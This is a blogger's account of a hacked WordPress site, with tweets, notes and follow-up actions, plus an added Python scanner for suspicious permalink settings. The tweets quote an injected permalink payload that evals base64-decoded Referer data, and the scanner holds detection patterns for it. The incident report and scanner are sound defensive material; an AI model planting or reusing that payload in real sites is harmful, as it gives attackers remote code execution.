Intro
For those of you who follow me via my @souterconsults account, you will have seen me have a paddy on this Friday last. That’s because my WP instance got hacked. Meh :$
So, I thought it would be useful to update anyone interested with a quick run-down, as it sets the scene for any future developments (like a complete re-build: bah).
I’m setting out here:
- List of tweets, which pretty much explain what happened
- Brief notes of more detail
- Other links, if they’re not in the first two sections
- Actions. Bah
Tweets
- argh, wanting to publish my Cloud vids from YouTube, but WP is putting %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/ on URL 3:15 PM Sep 4th from twhirl
- http://twurl.nl/06n2fh explains – I’m trying to find the malicious code asap :’( 3:42 PM Sep 4th from twhirl
- ok, I’ve switched off the navigation on the site & parked links to comments, archive, & recent posts to help avoid people getting borked 4:02 PM Sep 4th from twhirl
- Site back in action: WP Permalink config restored - http://twurl.nl/ddfchd fyi ‘Hardening WordPress’ http://twurl.nl/ih81jk 5:09 PM Sep 4th from twhirl
- just blogged: Cloud Computing – YouTube videos http://twurl.nl/g38ukl 5:23 PM Sep 4th from twitterfeed
- Links for WP hack %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/ again – http://twurl.nl/5qclh3 & http://twurl.nl/d55o4c 5:39 PM Sep 4th from twhirl
Notes
- Was posting about YouTube videos on Cloud Computing
- Copying and pasting the URL into Twhirl to send out on Twitter
- Noticed there was a whole string of characters after the ‘proper’ URL
- Deleted post
- Republished
- It was still there
- Copied the string and Googled it
- Found “[resolved] NASTY CODE hacks onto your domain. FIX included.” #2 in ‘Tweets’
- Went on from there & blogged original post…
Looking at my install:
- The plugin options table seems to have disappeared [although this may not be a bad thing – I should check the WP changelog…]
- WP pages seem clean at the mo’
Various links
Worthwhile checking out
- Helpful post by @matt on keeping WordPress secure. http://bit.ly/43gTBK If you’re not on 2.8.4, do the upgrade today. about 12 hours ago from Seesmic
- *Anyway*, Matt recommends this.
- Other links above
Actions
- Need to do several more, more detailed trawls through my WP install
- Probably need to do a rebuild (from scratch, preferably). Meh
- Enabled various plugins, e.g. Login LockedDown, but Maintenance Mode didn’t work :-(
A shot across the bows, hopefully not much more (fingers tightly crossed).
[UPDATE: fyi I believe I was on WP v2.8.0 when I was hacked. Latest version at the time of writing is 2.8.4.]
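One way to run the kind of trawl listed under Actions, as an added example (not the author's code or WordPress's own): it checks exported wp_options rewrite values for the string quoted in the tweets and for anything that is not a known structure tag or plain path text. It assumes the string was stored in the permalink setting, as the "WP Permalink config restored" tweet suggests; the function names, the tag allowlist and the sample rows are constructed for illustration.

```python
import re

# Structure tags documented for WordPress core; plugins can register others,
# so extend this set to match the site being checked.
KNOWN_TAGS = {"year", "monthnum", "day", "hour", "minute", "second",
              "post_id", "postname", "category", "author"}
# wp_options rows that feed the rewrite rules.
REWRITE_OPTIONS = ("permalink_structure", "category_base", "tag_base")

# PHP constructs present in the injected string quoted in the tweets.
CODE_TOKENS = re.compile(r"eval\s*\(|base64_decode|\$_[A-Z]+|\$\{", re.I)
TAG_RE = re.compile(r"%([a-z_]+)%")
LITERAL_RE = re.compile(r"[A-Za-z0-9/_.-]*")


def check_value(value):
    """Return findings for one option value; an empty list means it looks clean."""
    findings = []
    if CODE_TOKENS.search(value):
        findings.append("php-code-token")
    unknown = sorted(set(TAG_RE.findall(value)) - KNOWN_TAGS)
    if unknown:
        findings.append("unknown-tag:" + ",".join(unknown))
    # Whatever remains after removing %tag% markers should be plain path text.
    if not LITERAL_RE.fullmatch(TAG_RE.sub("", value)):
        findings.append("unexpected-characters")
    return findings


def scan_options(rows):
    """rows: iterable of (option_name, option_value) pairs exported from wp_options."""
    return {name: f for name, value in rows
            if name in REWRITE_OPTIONS and (f := check_value(value))}


# Constructed sample rows: a normal structure with the string from the post appended.
SAMPLE_ROWS = [
    ("permalink_structure", "/%year%/%monthnum%/%postname%/"
     "%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/"),
    ("category_base", ""),
    ("tag_base", "topics"),
    ("blogname", "eval(not a rewrite option)"),
]

if __name__ == "__main__":
    for name, findings in scan_options(SAMPLE_ROWS).items():
        print(name, findings)
```

A clean result here only covers the rewrite options; theme and plugin files and the rest of the database still need their own checks.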